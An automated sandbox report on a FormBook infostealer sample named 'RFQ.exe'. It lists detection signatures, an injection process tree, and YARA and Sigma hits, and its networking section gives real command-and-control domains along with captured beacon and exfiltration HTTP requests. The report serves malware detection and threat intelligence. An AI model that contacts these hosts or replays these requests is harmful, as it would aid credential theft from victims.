Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ.exe

Overview

General Information

Sample name:RFQ.exe
Analysis ID:1555881
MD5:ecd96717ac8201e049cfa4ca22e88dec
SHA1:51f5f84261750137131d01824bb817a837441af7
SHA256:67f01ea4fc25ae9f1a4ab574e0c474bd31ae7d561abc545bb65ca86d26f3daa5
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • RFQ.exe (PID: 1988 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: ECD96717AC8201E049CFA4CA22E88DEC)
    • svchost.exe (PID: 368 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • enUILRNjDql.exe (PID: 2076 cmdline: "C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • net.exe (PID: 7056 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • enUILRNjDql.exe (PID: 4068 cmdline: "C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3176 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 1988, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 368, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 1988, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 368, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: RFQ.exeReversingLabs: Detection: 29%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4573144434.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4572938071.00000000047E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291967315.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: RFQ.exeJoe Sandbox ML: detected
                Source: RFQ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2259882847.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2259828294.000000000321A000.00000004.00000020.00020000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000003.2664550517.0000000000D3B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: enUILRNjDql.exe, 00000003.00000000.2177115370.0000000000F4E000.00000002.00000001.01000000.00000004.sdmp, enUILRNjDql.exe, 00000006.00000002.4572759882.0000000000F4E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000000.00000003.2123424305.0000000003930000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.2122654812.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2162676008.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2160931204.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2291348058.0000000003380000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.000000000387E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2294260392.0000000003532000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ.exe, 00000000.00000003.2123424305.0000000003930000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.2122654812.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2162676008.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2160931204.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000003.2291348058.0000000003380000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.000000000387E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2294260392.0000000003532000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000004.00000002.4572237813.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000003D0C000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2362004164.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2588395806.000000002AE6C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000004.00000002.4572237813.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000003D0C000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2362004164.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2588395806.000000002AE6C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2259882847.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2259828294.000000000321A000.00000004.00000020.00020000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000003.2664550517.0000000000D3B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00776CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00776CA9
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_007760DD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_007763F9
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0077EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0077EB60
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0077F56F FindFirstFileW,FindClose,0_2_0077F56F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0077F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0077F5FA
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00781B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00781B2F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00781C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00781C8A
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00781F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00781F94
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EFC820 FindFirstFileW,FindNextFileW,FindClose,4_2_02EFC820
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then xor eax, eax4_2_02EE9D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then mov ebx, 00000004h4_2_035704E8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.066bet.xyz
                Source: Joe Sandbox ViewIP Address: 47.52.221.8 47.52.221.8
                Source: Joe Sandbox ViewIP Address: 128.65.195.180 128.65.195.180
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00784EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00784EB5
                Source: global trafficHTTP traffic detected: GET /yjfe/?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.corpseflowerwatch.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gnvu/?W638b4U=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fjjnnxvqu9VAopw5jutgMYieatrM5Tiebl9fmqoGSNeZ5Og==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.4nk.educationUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ym43/?W638b4U=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRTsdeZatTq9P8nD3DJaYsKbhsyMI+cP4BIi4vfpBrFLN6oA==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.migraine-massages.proUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /d26j/?W638b4U=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN1iJSRG9yUGoI2tAgRBkFBhEuTNxXB6UGYS0PM3LmZFBqDA==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.vnxoso88.artUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /afcr/?Xll=50hLc0Hhy&W638b4U=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8CGv24SZJcM9CuKerlXN+FNsiyWCFzy1PjnGczRtZq9rVpg== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.pluribiz.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1iqa/?W638b4U=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQjSyqzKDi3Wbpu+VrwdU4dvabDPmYf5pusJWuBQDberj5Ig==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kdtzhb.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /293d/?W638b4U=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGTfIU/JrlV2z9a9IQeyVbD4LqpyZAtBKJ4EaDgMR1jS91tA==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.evoo.websiteUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vdvc/?W638b4U=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRcKpdTLsadcBjXT18ECqhEbYKAo2NhS9FS63soq1W+eFfLA==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.astorg-group.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0m8a/?W638b4U=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAr/vHodlZDokX5k5j35YEbCksENzyPa61ZxusEcT508vfTQ==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fiqsth.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ezyn/?W638b4U=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMJKMiK3EdvOJmV73Jy75+c2YHLSLsa6dhHSYwd0sxfTHy3A==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bio-thymus.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9ezc/?Xll=50hLc0Hhy&W638b4U=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+NZNi8BTPy99Tau97oJsSOpJizwynXn/5fxfwmQ1lNSou+g== HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.wukong.collegeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /95c0/?W638b4U=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4Uod4s1803YDXY8kloLbvjpkOPOrnE5sGxLOIJT+RqysedQ==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.vehiculargustav.clickUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fjsq/?W638b4U=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSbA/Vc9/aSgY+IqBazWG3FiJEJ5+81Lg8Vy8GcHYtnLYhkw==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.yushaliu.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ucmb/?W638b4U=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLwkKxStK4w4vex/YLsSNnFHqgqyWr0vfKWW8f0ZD4+1Q9hQ==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.marketprediction.appUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /yjfe/?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.corpseflowerwatch.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gnvu/?W638b4U=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fjjnnxvqu9VAopw5jutgMYieatrM5Tiebl9fmqoGSNeZ5Og==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.4nk.educationUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ym43/?W638b4U=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRTsdeZatTq9P8nD3DJaYsKbhsyMI+cP4BIi4vfpBrFLN6oA==&Xll=50hLc0Hhy HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.migraine-massages.proUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.corpseflowerwatch.org
                Source: global trafficDNS traffic detected: DNS query: www.4nk.education
                Source: global trafficDNS traffic detected: DNS query: www.migraine-massages.pro
                Source: global trafficDNS traffic detected: DNS query: www.vnxoso88.art
                Source: global trafficDNS traffic detected: DNS query: www.pluribiz.life
                Source: global trafficDNS traffic detected: DNS query: www.kdtzhb.top
                Source: global trafficDNS traffic detected: DNS query: www.evoo.website
                Source: global trafficDNS traffic detected: DNS query: www.astorg-group.info
                Source: global trafficDNS traffic detected: DNS query: www.fiqsth.vip
                Source: global trafficDNS traffic detected: DNS query: www.bio-thymus.com
                Source: global trafficDNS traffic detected: DNS query: www.wukong.college
                Source: global trafficDNS traffic detected: DNS query: www.vehiculargustav.click
                Source: global trafficDNS traffic detected: DNS query: www.bulls777.pro
                Source: global trafficDNS traffic detected: DNS query: www.yushaliu.online
                Source: global trafficDNS traffic detected: DNS query: www.marketprediction.app
                Source: global trafficDNS traffic detected: DNS query: www.066bet.xyz
                Source: unknownHTTP traffic detected: POST /gnvu/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 208Cache-Control: max-age=0Connection: closeHost: www.4nk.educationOrigin: http://www.4nk.educationReferer: http://www.4nk.education/gnvu/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36Data Raw: 57 36 33 38 62 34 55 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 32 71 6b 4e 34 62 4f 70 38 73 4c 42 4e 72 4a 77 6a 70 61 4d 6a 71 35 6d 62 39 4e 4b 71 71 4d 54 55 50 67 6f 4b 51 3d Data Ascii: W638b4U=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuT2qkN4bOp8sLBNrJwjpaMjq5mb9NKqqMTUPgoKQ=
